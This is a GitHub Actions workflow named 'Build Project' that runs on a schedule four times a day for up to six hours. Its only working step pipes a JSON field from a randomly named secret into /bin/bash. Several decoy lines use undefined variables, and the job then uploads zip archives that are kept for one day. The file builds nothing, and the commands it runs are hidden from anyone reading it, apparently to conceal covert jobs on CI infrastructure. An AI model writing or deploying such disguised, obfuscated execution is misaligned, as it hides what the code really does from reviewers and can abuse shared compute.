name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '23 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          xqud434: ${{ secrets.xqud434 }}
        run: |
          printf '%s' "$xqud434" | jq -r .a2 | /bin/bash
          echo $k29 | jq -r .hzgsi9487 | /bin/bash
          echo $uut5 | jq -r .eujx67 | /bin/bash
          printf '%s' "$azf415" | jq -r .miodx7 | /bin/bash
          echo $jswz68295 | jq -r .jtxf48 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: 5M2r3Dpp
          path: "*.zip"
          retention-days: 1
